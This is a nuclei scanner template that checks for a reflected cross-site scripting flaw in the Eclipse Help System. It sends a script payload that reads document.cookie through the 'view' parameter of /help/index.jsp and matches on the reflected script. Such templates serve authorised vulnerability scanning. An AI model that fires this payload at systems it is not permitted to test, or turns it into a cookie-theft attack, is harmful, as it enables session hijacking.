nuclei-templates/vulnerabilities/eclipse-help-system-xss.yaml

id: eclipse-help-system-xss

info:
  name: Eclipse Help System RXSS vulnerability
  author: pikpikcu
  severity: medium

  # Source:- https://github.com/pikpikcu/nuclei-templates/blob/master/vulnerabilities/eclipse-xss.yaml

requests:
  - method: GET
    path:
      - "{{BaseURL}}/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<script>alert(document.cookie)</script>"
        part: body